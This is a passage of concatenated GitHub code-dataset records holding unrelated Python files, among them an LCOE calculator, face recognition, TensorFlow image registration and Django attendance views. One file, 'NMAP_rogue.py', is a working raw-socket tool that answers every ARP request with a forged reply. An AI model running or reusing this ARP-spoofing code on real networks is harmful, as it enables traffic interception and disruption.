produced.\n# Note: unlike the usual precedence where x is evaluated before +, assume every operation is evaluated from left to right.\n\n# my attempt\n# approach: when a 0 or 1 appears, use +; for any other digit, use *.\na=input().split()\nresult=0\nb=list()\nfor i in range(len(a[0])):\n b.append(int(a[0][i]))\n\nfor i in range(len(b)-1):\n if(b[i]<=1 or b[i+1]<=1):\n result=(b[i]+b[i+1])\n b[i+1]=result\n else:\n result = (b[i] * b[i + 1])\n b[i + 1] = result\nprint(result)\n\n\n\n# solution: if either of the two numbers is 0 or 1, + is more effective; otherwise x is.\ndata=input()\n# convert the first character to a number and assign it\nresult = int(data[0])\n\nfor i in range(1,len(data)):\n # if either of the two numbers is '0' or '1', add instead of multiplying\n num = int(data[i])\n if num <= 1 or result<=1:\n result +=num\n else:\n result *=num\nprint(result)","repo_name":"YeongM/PythonPractice","sub_path":"GreedtAlgorithm/Greedy3.py","file_name":"Greedy3.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25527033170","text":"#!/usr/bin/env python\n\nimport numpy as np\n\ndef posDef(M):\n\n n = int(np.sqrt(len(M)))\n M.resize((n,n))\n try:\n np.linalg.cholesky(0.5*(M+M.T))\n return 1\n except np.linalg.LinAlgError:\n return 0\n\ndef posDefMult(Ms):\n\n ind = np.zeros(Ms.shape[0],dtype=bool)\n for i in range(Ms.shape[0]):\n ind[i] = posDef(Ms[i])\n\n return ind\n\ndef find_wells(idnn,x):\n\n # Find \"wells\" (regions of convexity, with low gradient norm)\n\n # First, rereference the free energy\n pred = idnn.predict([x,x,x])\n mu_test = pred[1]\n eta_test = np.array([[0,0,0,0],\n [0.25,0.25,0.25,0.25]])\n y = idnn.predict([eta_test,eta_test,eta_test])[0]\n g0 = y[0,0]\n g1 = y[1,0]\n mu_test[:,0] = mu_test[:,0] - 4*(g1 - g0)\n gradNorm = np.sqrt(np.sum(mu_test**2,axis=-1))\n\n H = pred[2] # get the list of Hessian matrices\n ind2 = posDefMult(H) # indices of points with local convexity\n eta = x[ind2]\n gradNorm = gradNorm[ind2]\n\n ind3 = np.argsort(gradNorm)\n \n # Return eta values with local convexity, sorted by gradient norm (low to high)\n\n return 
eta[ind3]\n","repo_name":"sidsriva/graph_calculus","sub_path":"utility/convexity.py","file_name":"convexity.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33811886219","text":"\n\ndef cell_mapping(lines_mapping):\n\tcell_x = {i:[] for i in list(set([i[0] for i in lines_mapping]))}\n\tfor line_map in lines_mapping:\n\t\tfrom_cell = line_map[0]\t\n\t\tmap_cell = line_map[2]\n\t\tif map_cell not in cell_x.get(from_cell):\n\t\t\tcell_x[from_cell] = cell_x.get(from_cell) + [map_cell]\n\treturn cell_x\t\n\n\nif __name__ == \"__main__\":\n\tprint(\"cell_mapping\")\n","repo_name":"LofOWL/Jupyter-code-tracker","sub_path":"mapping/cell_mapping/cell_mapping.py","file_name":"cell_mapping.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2198495127","text":"from typing import Tuple, Any\n\nimport pandas as pd\nfrom topografic import is_location_offshore, get_distance_to_coast\nimport geopandas as gpd\nimport streamlit as st\n\n@st.cache_data()\ndef read_tech_and_cable_data():\n cables = {\n 'max capacity': [250, 500, 750, 1000, 1250, 1500, 1750, 2000, 2250, 2500],\n 'Offshore substations': [1, 2, 2, 2, 3, 3, 4, 4, 4, 5],\n 'Export cables': [1, 2, 3, 3, 4, 5, 6, 6, 7, 8]\n }\n\n tech = pd.read_csv(\"../data/lcoe/tech_data.csv\", index_col=0)\n\n cables = pd.DataFrame(cables)\n return tech, cables\n\n\ndef choose_export_cables(capacity)->int:\n df = read_tech_and_cable_data()[1]\n\n # Prompt the user for the input capacity\n\n # Filter the DataFrame to find the number of export cables\n filtered_df = df[df['max capacity'] > capacity]\n num_export_cables = filtered_df['Export cables'].iloc[0]\n num_arrays = filtered_df['Offshore substations'].iloc[0]\n return num_export_cables, num_arrays\n\ndef calc_lcoe(capacity: float, power_yield: float, distance: float, depth: float, value: str=\"lower\"):\n \"\"\"\n # Todo: Check units\n :param capacity: Capacity of Turbine in MW\n :param power_yield: power yield for whole year in MWh\n :param distance: distance to coast in m\n :param depth: depth at location in m\n :param value: decision variable whether to use upper, middle or lower bounds\n where lower is meant in terms of low cost\n :return:\n \"\"\"\n\n tech = read_tech_and_cable_data()[0]\n # calculate capex costs\n # Turbine\n capex_turbine = (\n (\n tech.loc[\"Nominal investment (equipment: turbines) [M€/MW_e]\"][value]\n + tech.loc[\"Nominal investment (installation: turbines) [M€/MW_e]\"][value]\n )\n * capacity\n * 1e6\n )\n # Foundation\n if depth < 20: # Monopile\n capex_found = (\n tech.loc[\n \"Nominal investment (equipment + installation: foundation monopile) [M€/MW_e]\"\n ][value]\n * capacity\n * 1e6\n )\n\n elif depth > 20 and depth < 40: # Tripod\n capex_found = (\n tech.loc[\n \"Nominal investment (equipment + installation: foundation jacket) [M€/MW_e]\"\n ][value]\n * capacity\n * 1e6\n )\n else: # Floating\n capex_found = (\n tech.loc[\n \"Nominal investment (equipment+installation: foundation floating) [M€/MW_e]\"\n ][value]\n * capacity\n * 1e6\n )\n\n number_of_cables, num_arrays = choose_export_cables(capacity=capacity)\n\n # array cables\n capex_array = (\n (\n tech.loc[\"Nominal investment (equipment: array cables) [M€/MW]\"][value]\n + tech.loc[\"Nominal investment (installation: array cables) [M€/MW]\"][value]\n )\n * capacity\n * 1e6\n )\n\n # grid connection\n capex_export 
= (\n tech.loc[\n \"Nominal investment (equipment+installation: grid connection) [M€/km]\"\n ][value]\n *number_of_cables\n * distance\n * 1e6\n )\n\n # Planning\n capex_project = (\n tech.loc[\"Nominal investment (Project development etc.) [M€/MW_e]\"][value] * 1e6\n )\n # Sum total capex\n capex = capex_project + capex_export + capex_array + capex_turbine + capex_found\n # calculate annuity factor\n wacc = tech.loc[\"WACC_real [%]\"][value] / 100\n af = (wacc * pow((1 + wacc), tech.loc[\"Technical lifetime [years]\"][value])) / (\n pow((1 + wacc), tech.loc[\"Technical lifetime [years]\"][value]) - 1\n )\n # calculate OPEX\n opex = (\n tech.loc[\"Fixed O&M [€/MW_e/y]\"][value] * capacity\n + tech.loc[\"Variable O&M [€/MWh_e]\"][value] * power_yield\n )\n # calculate lcoe\n lcoe = ((capex * af) + opex) / power_yield\n return lcoe, pd.Series({\n \"Name\": \"Capex and Opex\",\n \"Capex_Turbine\": capex_turbine,\n \"Capex_Foundation\": capex_found,\n \"Capex_Array_Cables\": capex_array,\n \"Capex_Grid_Connection\": capex_export,\n \"Capex_Planning\": capex_project,\n \"Opex\": opex,\n })\n\n\ndef calc_lcoe_from_series(\n row: pd.Series,\n capacity: float,\n countries: gpd.GeoDataFrame,\n value: str = \"lower\",\n other_countries_connection: bool = True,\n progress: st.progress = None,\n number_of_values: int = 1\n) -> tuple[float | Any, float] | None:\n \"\"\"\n Takes a pandas series to calculate lcoe based on given series and its index.\n :return:\n \"\"\"\n\n offshore = is_location_offshore(countries=countries, point=row[\"geometry\"])\n if progress:\n progress.progress(row[\"index\"] / number_of_values)\n if offshore:\n distance = get_distance_to_coast(\n countries=countries,\n point=row[\"geometry\"],\n toggle=other_countries_connection,\n )\n return (\n calc_lcoe(\n power_yield=row[\"Generation in MWh\"],\n capacity=capacity,\n depth=row[\"depth\"],\n distance=distance,\n value=value,\n )[0],\n distance,\n )\n else:\n return None\n","repo_name":"FelixMau/offshore_LCOE","sub_path":"scripts/lcoe.py","file_name":"lcoe.py","file_ext":"py","file_size_in_byte":5302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9269738409","text":"import cv2\nimport numpy as np\nimport pickle\n\ncapt=cv2.VideoCapture('queue.mp4')\nfface=cv2.CascadeClassifier(\"haarcascade_frontalface_alt2.xml\")\npface=cv2.CascadeClassifier(\"haarcascade_profileface.xml\")\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\nrecognizer.read(\"trainner.yml\")\nwith open(\"labels.pickle\", 'rb') as f:\n\tqlabels=pickle.load(f)\n\tlabels= {v:k for k,v in qlabels.items()}\n\nwhile True:\n ret,frame=capt.read()\n #img=cv2.imread(\"3.jpeg\")\n cgray=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n gray=cv2.equalizeHist(cgray)\n inv_frame=cv2.flip(frame,1)\n inv_gray=cv2.cvtColor(inv_frame,cv2.COLOR_BGR2GRAY)\n ffaces=fface.detectMultiScale(gray,scaleFactor=1.3,minNeighbors=2)\n rfaces=pface.detectMultiScale(gray,scaleFactor=1.3,minNeighbors=2)\n lfaces=pface.detectMultiScale(inv_gray,scaleFactor=1.3,minNeighbors=2)\n font=cv2.FONT_HERSHEY_SIMPLEX\n for x,y,w,h in ffaces:\n roi=gray[y:y+h,x:x+w]\n _id,conf=recognizer.predict(roi)\n if conf<=90:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(0,0,0),2)\n cv2.putText(frame,labels[_id],(x,y+20),font,1,(255,0,0),2)\n elif conf>=90 and conf<=110:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(0,0,0),2)\n cv2.putText(frame,\"Not a Person\",(x,y+20),font,1,(255,0,0),2)\n print(conf)\n print(roi)\n for x,y,w,h in rfaces:\n roi=gray[y:y+h,x:x+w]\n 
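# annotation (added; not in the original source): LBPH predict() returns (label, confidence),\n # where lower confidence means a closer match, which is why small values are accepted below.\n 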
_id,conf=recognizer.predict(roi)\n if conf<=100:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,255),2)\n cv2.putText(frame,labels[_id],(x,y+20),font,1,(255,0,0),2)\n elif conf>=100 and conf<=110:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,255),2)\n cv2.putText(frame,\"Not a Person\",(x,y+20),font,1,(255,0,0),2)\n print(conf)\n for x,y,w,h in lfaces:\n roi=inv_gray[y:y+h,x:x+w]\n print(roi)\n _id,conf=recognizer.predict(roi)\n if conf<=100:\n cv2.rectangle(frame,(x+40,y),(x+w+40,y+h),(255,255,0),2)\n cv2.putText(frame,labels[_id],(x,y+20),font,1,(255,0,0),2)\n elif conf>=100 and conf<=120:\n cv2.rectangle(frame,(x+40,y),(x+w+40,y+h),(255,255,0),2)\n cv2.putText(frame,\"Not a Person\",(x+40,y+20),font,1,(255,0,0),2)\n print(conf)\n cv2.imshow(\"frame\",frame)\n if cv2.waitKey(20) & 0xFF==ord(\" \"):\n exit(0)\n\n\n \n","repo_name":"saloni15495/Queue-Manager","sub_path":"fullfacedetect.py","file_name":"fullfacedetect.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"36918327747","text":"import socket\nimport struct\nimport binascii\nimport time\nimport textwrap\n\n\nclass Sniffer:\n def __init__(self):\n self.sourceMac = ''\n self.sourceIP = ''\n self.destMac = ''\n self.destIp = ''\n self.sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))\n self.sock.bind(('eth0', 0))\n self.read()\n\n def read(self):\n while True:\n packet = self.sock.recvfrom(2048)\n\n ethernet_header = packet[0][0:14]\n ethernet_detailed = struct.unpack(\"!6s6s2s\", ethernet_header)\n\n arp_header = packet[0][14:42]\n arp_detailed = struct.unpack(\"2s2s1s1s2s6s4s6s4s\", arp_header)\n\n if(binascii.hexlify(ethernet_detailed[2]) != b'0806'):\n continue\n\n print(\"****************_ETHERNET_FRAME_****************\")\n print(\"Dest MAC: \", binascii.hexlify(ethernet_detailed[0]))\n print(\"Source MAC: \", binascii.hexlify(ethernet_detailed[1]))\n print(\"Type: \", binascii.hexlify(ethernet_detailed[2]))\n print(\"************************************************\")\n print(\"******************_ARP_HEADER_******************\")\n print(\"Hardware type: \", binascii.hexlify(arp_detailed[0]))\n print(\"Protocol type: \", binascii.hexlify(arp_detailed[1]))\n print(\"Hardware size: \", binascii.hexlify(arp_detailed[2]))\n print(\"Protocol size: \", binascii.hexlify(arp_detailed[3]))\n print(\"Opcode: \", binascii.hexlify(arp_detailed[4]))\n print(\"Source MAC: \", binascii.hexlify(arp_detailed[5]))\n print(\"Source IP: \", socket.inet_ntoa(arp_detailed[6]))\n print(\"Dest MAC: \", binascii.hexlify(arp_detailed[7]))\n print(\"Dest IP: \", socket.inet_ntoa(arp_detailed[8]))\n print(\"*************************************************\\n\")\n\n self.sourceMac = ethernet_detailed[1]\n self.sourceIP = arp_detailed[6]\n self.destMac = arp_detailed[7]\n self.destIp = arp_detailed[8]\n\n self.ARPreply()\n\n def ARPreply(self):\n nulls = [0x00 for i in range(0, 18)]\n ARP_FRAME = [\n struct.pack('!6B', *self.sourceMac), # DESTINATION MAC ADDRESS\n struct.pack('!6B', *binascii.unhexlify(b'deadbeefdead')), # SOURCE MAC ADDRESS\n struct.pack('!H', 0x0806), # 0X0806 IS A ARP TYPE\n struct.pack('!H', 0x0001), # 0X0001 IS A ETHERNET HW TYPE\n struct.pack('!H', 0x0800), # 0X0800 IS A IPV4 PROTOCOL\n struct.pack('!B', 0x06), # 0X06 HW SIZE (MAC)\n struct.pack('!B', 0x04), # 0X04 PROTOCOL SIZE (IP)\n struct.pack('!H', 0x0002), # 0x0002 IS A ARP REPLY\n struct.pack('!6B', *binascii.unhexlify(b'deadbeefdead')), # SENDER 
MAC\n struct.pack('!4B', *self.destIp), # SENDER IP\n struct.pack('!6B', *self.sourceMac), # TARGET MAC\n struct.pack('!4B', *self.sourceIP), # TARGET IP\n struct.pack('!18B', *nulls)\n ]\n\n print(\"_________ARP reply___________\")\n print(\"DESTINATION MAC ADDRESS\",self.sourceMac )\n print(\"SOURCE MAC ADDRESS \", binascii.unhexlify(b'deadbeefdead'))\n print(\"SENDER MAC \", binascii.unhexlify(b'deadbeefdead'))\n print(\"SENDER IP \", struct.unpack('!4B', self.destIp))\n print(\"TARGET MAC \", struct.unpack('!6B', self.sourceMac))\n print(\"TARGET IP \", struct.unpack('!4B', self.sourceIP))\n print(\"_____________________________\")\n time.sleep(0.001)\n self.sock.send(b''.join(ARP_FRAME))\n\n\nif __name__ == \"__main__\":\n snif = Sniffer()","repo_name":"Odin-SG/ARPQueryReplyer","sub_path":"NMAP_rogue.py","file_name":"NMAP_rogue.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73305402065","text":"from torch.utils.data import Dataset\nimport pandas as pd\nimport os\nimport numpy as np\nimport cv2\nimport json\n\nclass DoodlesRandomDataset(Dataset):\n \"\"\"Doodles csv dataset.\"\"\"\n\n def __init__(self, csv_file, root_dir, chunksize, mode='train', size=256, transform=None):\n \"\"\"\n Args:\n csv_file (string): Path to the csv file with annotations.\n root_dir (string): Directory with all the images.\n chunksize (int): chunk size per dataframe\n mode (string): Train or test mode.\n size (int): Size of output image.\n transform (callable, optional): Optional transform to be applied\n on a sample.\n \"\"\"\n self.root_dir = root_dir\n file = os.path.join(self.root_dir, csv_file)\n self.size = size\n self.mode = mode\n self.doodles = []\n for doodle in pd.read_csv(file, chunksize=chunksize, usecols=[\"drawing\", \"y\"]):\n doodle[\"drawing\"] = doodle[\"drawing\"].apply(json.loads)\n self.doodles.append(doodle)\n\n self.transform = transform\n\n @staticmethod\n def _draw(raw_strokes, size=256, lw=6, time_color=True):\n BASE_SIZE = 256\n img = np.zeros((BASE_SIZE, BASE_SIZE), np.uint8)\n for t, stroke in enumerate(raw_strokes):\n for i in range(len(stroke[0]) - 1):\n color = 255 - min(t, 10) * 13 if time_color else 255\n _ = cv2.line(img, (stroke[0][i], stroke[1][i]),\n (stroke[0][i + 1], stroke[1][i + 1]), color, lw)\n if size != BASE_SIZE:\n return cv2.resize(img, (size, size))\n else:\n return img\n\n def __len__(self):\n\n return len(self.doodles)\n\n def __getitem__(self, idx):\n doodle = self.doodles[idx]\n # form the batch\n x = np.zeros((len(doodle), 1, self.size, self.size))\n for i, raw_strokes in enumerate(doodle.drawing.values):\n x[i, 0] = self._draw(raw_strokes, size=self.size, lw=2,\n time_color=False)\n label = doodle.y.to_numpy()\n\n if self.transform:\n x = self.transform(x)\n if self.mode == 'train':\n return (x[None] / 255).astype('float32'), label\n else:\n return (x[None] / 255).astype('float32')\n","repo_name":"lanking520/quickdraw","sub_path":"doodle_random.py","file_name":"doodle_random.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73999690707","text":"from __future__ import division, print_function, unicode_literals\nimport tensorflow as tf\nimport tensorflow_addons as tfa\nimport copy\nimport numpy as np\n\nclass networks(object):\n\n def __init__(\n self,\n is_training,\n n_input,\n n_hiddens,\n n_images,\n img_size, \n fixed_image,\n filter_size 
= 7,\n channels_num = 32,\n X = None,\n indices=None\n ):\n tf.random.set_seed(1)\n self.is_training = is_training\n n_hiddens=copy.deepcopy(n_hiddens)\n self.loss= {}\n\n self.filter_size = filter_size\n self.channels_num = channels_num\n self.img_size = img_size\n self.n_images = n_images\n self.fixed_image = fixed_image \n self.ResizeMethod = 'bicubic'\n n_hiddens.append(n_input)\n\n self.n_input =n_input \n\n self.X = X\n\n self.indices = indices\n self.activation = tf.nn.elu\n initializer = tf.keras.initializers.GlorotNormal()\n self.initializer =initializer\n l_reg = 0.005\n self.regularizer = tf.keras.regularizers.L2(l_reg)\n\n n_layers = len(n_hiddens)\n assert n_layers >= 2\n\n with tf.compat.v1.variable_scope(\"decoder\"):\n self.W=[]\n self.b=[]\n self.t = tf.compat.v1.get_variable(name=\"t\", shape=(n_images,n_hiddens[0]), dtype=tf.float32, initializer= initializer, regularizer=self.regularizer)\n\n for i in range(1,n_layers):\n layer = str(i)\n\n self.W.append( tf.compat.v1.get_variable(name=\"deep_Weight_\"+layer, shape=(n_hiddens[i-1], n_hiddens[i]), dtype=tf.float32, initializer= initializer, regularizer=self.regularizer) )\n\n self.b.append(tf.compat.v1.get_variable(name=\"deep_bias_\"+layer, shape=(n_hiddens[i]) , dtype=tf.float32, initializer= tf.zeros_initializer))\n\n with tf.compat.v1.variable_scope(\"inputs\"):\n height,width,_= img_size\n self.z = tf.compat.v1.get_variable(name=\"z\", shape=(n_images,height//8, width//8,1), dtype=tf.float32, initializer= tf.keras.initializers.VarianceScaling())\n\n with tf.compat.v1.variable_scope(\"params\"): \n self.illum = tf.compat.v1.get_variable(name=\"illumination\", shape=(n_images,n_input), dtype=tf.float32, initializer= initializer, regularizer=self.regularizer)\n\n def net(self, t, W, b):\n \n hidden = t\n \n for i in range(0,len(W)-1):\n hidden = tf.matmul(hidden, W[i]) + b[i]\n hidden = tf.compat.v1.layers.batch_normalization(hidden, training=self.is_training)\n hidden = self.activation(hidden)\n \n X_hat = tf.nn.sigmoid(tf.matmul(hidden, W[-1]) + b[-1])\n return X_hat \n\n def conv_decoder(self, hidden , scale):\n stride=2\n batch_size = tf.shape(hidden)[0]\n _,input_height,input_width,in_channels = hidden.get_shape()\n filter_size = self.filter_size\n channels_num = self.channels_num\n\n \n with tf.compat.v1.variable_scope(scale, reuse=tf.compat.v1.AUTO_REUSE):\n \n out_channels=channels_num\n shape =[filter_size, filter_size, in_channels, out_channels]\n w_conv1 = tf.compat.v1.get_variable(\n name='W_conv1',\n shape=shape,\n initializer=self.initializer,\n regularizer=self.regularizer\n ) \n conv1 = tf.nn.conv2d(\n hidden,\n w_conv1,\n strides=[1, 1, 1, 1],\n padding=\"SAME\") \n conv1 =self.activation(conv1)\n \n \n in_channels = channels_num\n out_channels = channels_num\n shape = [filter_size, filter_size, out_channels, in_channels]\n W_deconv1 = tf.compat.v1.get_variable(\n name='W_deconv1',\n shape=shape,\n initializer=self.initializer,\n regularizer=self.regularizer\n )\n output_shape = [batch_size,input_height*stride,input_width*stride, out_channels]\n deconv1 = tf.nn.conv2d_transpose(conv1, W_deconv1, output_shape, strides=[1, 2, 2, 1], padding=\"SAME\")\n deconv1 =self.activation(deconv1)\n \n \n in_channels = channels_num\n out_channels = channels_num\n shape =[filter_size, filter_size, in_channels, out_channels]\n w_conv2 = tf.compat.v1.get_variable(\n name='W_conv2',\n shape=shape,\n initializer=self.initializer,\n regularizer=self.regularizer\n ) \n conv2 = tf.nn.conv2d(\n deconv1,\n w_conv2,\n 
strides=[1, 1, 1, 1],\n padding=\"SAME\") \n conv2 =self.activation(conv2) \n \n out_channels = 2\n in_channels = channels_num\n shape = [filter_size, filter_size, out_channels, in_channels]\n W_deconv2 = tf.compat.v1.get_variable(\n name='W_deconv2',\n shape=shape,\n initializer=self.initializer,\n regularizer=self.regularizer\n ) \n output_shape = [batch_size,input_height*stride,input_width*stride, out_channels]\n deconv2 = tf.nn.conv2d_transpose(conv2, W_deconv2,output_shape, strides=[1, 1, 1, 1], padding=\"SAME\")\n deconv2 =self.activation(deconv2)\n\n return deconv1,deconv2 \n\n def warp(self, X , z ):\n \n X = tf.reshape(X,(-1,*self.img_size))\n _,h,w,c = X.shape \n scale1_4=[(h//8)*2,(w//8)*2]\n scale1_2=[(h//8)*4,(w//8)*4] \n X1_4 = tf.image.resize(X,scale1_4,method=self.ResizeMethod)\n X1_2 = tf.image.resize(X,scale1_2,method=self.ResizeMethod)\n \n z = tf.gather(z,self.indices)\n z1,f1_4 = self.conv_decoder(z,\"scale_1\")\n z2,f1_2 = self.conv_decoder(z1,\"scale_2\")\n _,f1 = self.conv_decoder(z2,\"scale_3\")\n \n _,input_height,input_width,_ = f1_4.get_shape()\n T1_4=f1_4 \n T1_2 = f1_2 + tf.image.resize(T1_4,[input_height*2,input_width*2],method=self.ResizeMethod)\n T1 = f1 + tf.image.resize(T1_2,[input_height*4,input_width*4],method=self.ResizeMethod)\n\n warped_X = tfa.image.dense_image_warp(X,T1,name='dense_image_warp_1')\n warped_X =tf.reshape(warped_X,(-1,self.n_input))\n \n warped_X1_2 = tfa.image.dense_image_warp(X1_2,T1_2,name='dense_image_warp_1_2')\n size=scale1_2[0]*scale1_2[1]*c\n warped_X1_2 =tf.reshape(warped_X1_2,(-1,size))\n \n warped_X1_4 = tfa.image.dense_image_warp(X1_4,T1_4,name='dense_image_warp_1_4') \n size=scale1_4[0]*scale1_4[1]*c\n warped_X1_4 =tf.reshape(warped_X1_4,(-1,size)) \n \n T1_loss = tf.reduce_mean(tf.reduce_sum(tf.square( tf.abs(T1)),axis=1))\n T1_2loss = tf.reduce_mean(tf.reduce_sum(tf.square( tf.abs(T1_2)),axis=1))\n T1_4loss = tf.reduce_mean(tf.reduce_sum(tf.square( tf.abs(T1_4)),axis=1))\n \n return T1, warped_X, warped_X1_2, warped_X1_4, T1_loss, T1_2loss, T1_4loss\n\n def get_scale_losses(self, warped_X1_4, warped_X1_2, warped_X):\n\n I_fixed=tf.reshape(self.fixed_image,(1,*self.img_size))\n \n _,h,w,c = I_fixed.shape \n scale1_4=[(h//8)*2,(w//8)*2]\n scale1_2=[(h//8)*4,(w//8)*4] \n \n I_fixed1_4 = tf.image.resize(I_fixed,scale1_4,method=self.ResizeMethod)\n I_fixed1_2 = tf.image.resize(I_fixed,scale1_2,method=self.ResizeMethod)\n \n size=scale1_4[0]*scale1_4[1]*c \n I_fixed1_4 = tf.reshape(I_fixed1_4 ,(1,size))\n I_fixed1_4 =tf.cast(I_fixed1_4,tf.float32)\n diff = tf.abs(I_fixed1_4 -warped_X1_4)\n loss1 = tf.reduce_mean(tf.reduce_sum(tf.square(diff),axis=1))\n \n size=scale1_2[0]*scale1_2[1]*c \n I_fixed1_2 = tf.reshape(I_fixed1_2 ,(1,size))\n I_fixed1_2 =tf.cast(I_fixed1_2,tf.float32)\n diff = tf.abs(I_fixed1_2 -warped_X1_2)\n loss2 = tf.reduce_mean(tf.reduce_sum(tf.square(diff),axis=1))\n \n I_fixed = tf.reshape(I_fixed,(1,self.n_input))\n I_fixed =tf.cast(I_fixed,tf.float32)\n diff = tf.abs(I_fixed -warped_X)\n loss3 = tf.reduce_mean(tf.reduce_sum(tf.square(diff),axis=1))\n \n return loss1, loss2, loss3 \n\n def get_loss(self):\n reg_loss = tf.reduce_mean(tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.REGULARIZATION_LOSSES))\n self.flow, warped_X, warped_X1_2, warped_X1_4, T1_loss, T1_2loss, T1_4loss = self.warp( self.X , self.z )\n self.warped_img = warped_X\n \n beta = 1\n T_loss = 1*T1_loss + beta*T1_2loss + beta*beta*T1_4loss\n loss1, loss2, loss3 = self.get_scale_losses( warped_X1_4, warped_X1_2, warped_X)\n beta = 0.25\n 
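# annotation (added; not in the original source): per-scale photometric losses are blended with\n        # geometric weights 1, beta, beta^2 (beta = 0.25), weighting the coarsest scale most heavily.\n        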
loss_1_2_3 = 1*loss1 + beta*loss2 + beta*beta*loss3\n warping_loss = 1*loss_1_2_3 + 1*T_loss\n t = tf.gather(self.t,self.indices)\n X_hat= self.net(t,self.W,self.b)\n self.X_hat_0=X_hat\n diff = tf.abs(warped_X - X_hat)\n reconstruction_loss = tf.reduce_mean(tf.reduce_sum(diff, axis=1)) \n \n foreground = warped_X - X_hat\n foreground = tf.reshape(foreground,(-1,*self.img_size))\n warped_foreground = tfa.image.dense_image_warp(foreground,-1*self.flow,name='foreground_image_warp')\n self.warped_foreground =tf.reshape(warped_foreground,(-1,self.n_input))\n \n total_loss = reg_loss + 1*warping_loss + 0.1*reconstruction_loss\n \n self.loss = {'total_loss':total_loss, 'warping_loss':warping_loss,'loss_1_2_3 ':loss_1_2_3 , 'loss1':loss1,'loss2':loss2,'loss3':loss3,'T_loss':T_loss,'T1_loss':T1_loss,'T1_2loss':T1_2loss, 'T1_4loss':T1_4loss,'reconstruction_loss':reconstruction_loss,'reg_loss':reg_loss }\n\n return self.loss,self.warped_img\n","repo_name":"FatemeBahri/DBSGen","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7216889264","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\noption = webdriver.ChromeOptions()\noption.add_experimental_option(\"detach\",True)\n\ndriver = webdriver.Chrome(options=option)\n\nurl = \"https://www.python.org/\"\n\n\ndriver.get(url)\nevent_time = driver.find_elements(By.CSS_SELECTOR,value=\".event-widget time\")\nevent_name = driver.find_elements(By.CSS_SELECTOR,value=\".event-widget li a\")\n\nevent = {}\n\nfor n in range(len(event_time)):\n event[n] = {\n \"time\" : event_time[n].text,\n \"name\" : event_name[n].text\n }\n\nprint(event)\n\n\n\n\ndriver.quit()\n\n","repo_name":"lusiusfebry/100-days-python","sub_path":"Project/Day-48_Selenium/challange-1.py","file_name":"challange-1.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26757030356","text":"from django.shortcuts import render_to_response, redirect\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.contrib import auth\nfrom django.views.decorators.csrf import csrf_exempt\nfrom login.models import UserProfile, AttendLog\nimport datetime\nimport json\n# Create your views here.\n\ndef login(request):\n if request.method == 'POST':\n username = request.POST.get('username', '')\n password = request.POST.get('password', '')\n user = auth.authenticate(username=username, password=password)\n if user is not None and user.is_active:\n auth.login(request, user)\n return HttpResponseRedirect(\"/profile/\")\n return render_to_response(\"login.html\", RequestContext(request))\n\n\ndef profile(request):\n if request.user.is_authenticated():\n info = {\n \"username\": request.user.username,\n }\n return render_to_response(\"profile.html\", RequestContext(request, info))\n else:\n return redirect('login.views.login')\n\n@csrf_exempt\ndef clockin(request):\n if request.user.is_authenticated():\n try:\n user = UserProfile.objects.get(user=request.user)\n except UserProfile.DoesNotExist:\n user = UserProfile.objects.create(user=request.user)\n try:\n log = user.attendlog_set.get(date=datetime.date.today())\n except AttendLog.DoesNotExist:\n log = AttendLog.objects.create(user=user, date=datetime.date.today())\n period = request.POST.get('period', '')\n sheet = {}\n if 
getattr(log, period) is None:\n setattr(log, period, datetime.datetime.now().time())\n log.save()\n thislog = user.attendlog_set.all()[:10]\n for index in range(thislog.count()):\n sheet[index] = {\n \"date\": str(thislog[index].date),\n \"morning\": str(thislog[index].morning)[:5],\n \"afternoon\": str(thislog[index].afternoon)[:5],\n \"evening\": str(thislog[index].evening)[:5],\n }\n return HttpResponse(json.dumps(sheet))\n","repo_name":"Lw-Cui/gmsite","sub_path":"login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73938694224","text":"import sys\nfrom PyQt5.QtWidgets import QApplication,QDialog,QMessageBox, QTableWidgetItem\nfrom PyQt5 import uic\nfrom form_libro_iva_ventas_nuevo import Ui_form_libro_iva_ventas_nuevo\nfrom PyQt5.QtCore import pyqtRemoveInputHook\nfrom E_plan_cuentas import E_plan_cuentas\nfrom E_ejercicio import E_ejercicio\nfrom E_cliente import E_cliente\nfrom E_proveedor import E_proveedor\nfrom E_libro_iva_venta import E_libro_iva_ventas\nfrom E_ejercicio_detalle import E_ejercicio_detalle\n\nclass libro_iva_ventas_nuevo(QDialog):\n obj_form= Ui_form_libro_iva_ventas_nuevo()\n lista_ejercicio = \"\"\n lista_proveedor = \"\"\n\n def __init__(self):\n QDialog.__init__(self)\n obj_form= Ui_form_libro_iva_ventas_nuevo()\n 